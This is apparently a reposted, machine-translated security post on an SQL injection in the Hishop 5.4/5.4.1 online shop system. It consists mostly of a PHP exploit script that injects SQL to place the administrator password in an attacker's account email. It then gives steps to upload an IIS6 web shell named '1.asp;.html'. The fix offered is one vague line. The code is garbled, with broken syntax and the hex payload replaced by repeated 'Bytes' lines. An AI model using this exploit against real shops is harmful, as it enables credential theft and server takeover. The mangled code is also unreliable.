Hishop 5.4 & amp; 5.4.1 online shop system SQL injection vulnerability and repair

Hishop online shop system V5.4 official version is a B2C online shopping mall system developed independently based on the B/S architecture of WEB applications on the Hao network. It provides the best protection for enterprises and large and medium-sized network merchants, to meet customers' current and future independent online shop application needs. The system runs on Microsoft's. NET platform and uses the latest ASP. NET 2.0 technology for hierarchical development. With more than 0.3 million of users in 9 years of extensive application and detection of complex environments, the system has a good reputation in terms of security, stability, and ease of use. V5.4 official version adds many practical functions such as group buying and time-limited flash sales on the basis of the official version 5.3. features are fully optimized and the system is upgraded.

Hishop has not exploded since 5.1 and 5.1.3 ..

An injection point was found some time ago, but the statement is a bit complicated and the underline is also filtered (the table name contains underlines). Therefore, it must be specially constructed, this injection point can be used with iis6 to get the shell.

Select this type of URL

 

------------------------------- Start of EXP code -----------------------------------
<? Php
Print_r ('
+ ------------------------- +
Hishop 5.4 & 5.4.1 SQL injection exploit Data: 2011.6.9
+ ------------------------- +
');
If ($ argc <3 ){
Print_r ('
+ ------------------------- +
Usage: php '. $ argv [0]. 'Host Port Path RegMail
Example:
Php '. $ argv [0].' localhost 80/SHOES/category-92.aspx? ValueStr = 35_0 syc@myclover.org
+ ------------------------- +
');
Exit;
}
$ Host = $ argv [1];
$ Port = $ argv [2];
$ Path = $ argv [3];
$ Mail = $ argv [4];
$ Expdata = "";
For ($ I = 0; $ I <strlen ($ mail); $ I ++)
$ Expdata = $ expdata. dechex (ord ($ mail [$ I]). "00 ″;
$ Expdata = strtoupper ($ expdata );
$ Expdata = "% 27) % 20or % 201 = 1; DECLARE % 20 @ S % 20 NVARCHAR (4000) % 20 SET % 20 @ S = CAST (Broadcast

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

45006D00610069006C003D002700 ". $ expdata." 2700% 20AS % 20 NVARCHAR (4000) % 20 EXEC (@ S );-";
GET ($ host, $ port, $ path, $ expdata, 30 );
Function GET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = "){
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30 );
If (! $ Fp ){
Echo "{$ errstr} ({$ errno}) <br/> ";
Exit;
}

$ Out = "GET $ path $ data HTTP/1.1 ";
$ Out. = "Host: $ host: $ port ";
$ Out. = "Connection: CLOSE ";

Fwrite ($ fp, $ out );
While (! Feof ($ fp )){
Fgets ($ fp, 128 );
}
Fclose ($ fp );
}
Print_r ('
+ ------------------------- +
[+] Get Manager Password
[1] Go to [Login]-> [my account]-> [Personal Information]
[2] The email contains the administrator password.
[3] Good Luck!
+ ------------------------- +
[+] Get WebShell (IIS6)
[1] log on to the background/admin/[product management]-"[Category template settings]
[2] upload 1.asp;.html
[3] Shell address: http://www.bkjia.com/Themes/default/zh-cn/categorythemes/1.asp;.html
+ ------------------------- +
');
?>

Www.2cto.com provides repair: enhanced filtering. I have been wondering whether to upgrade to win2008 recently. iis7 is reliable.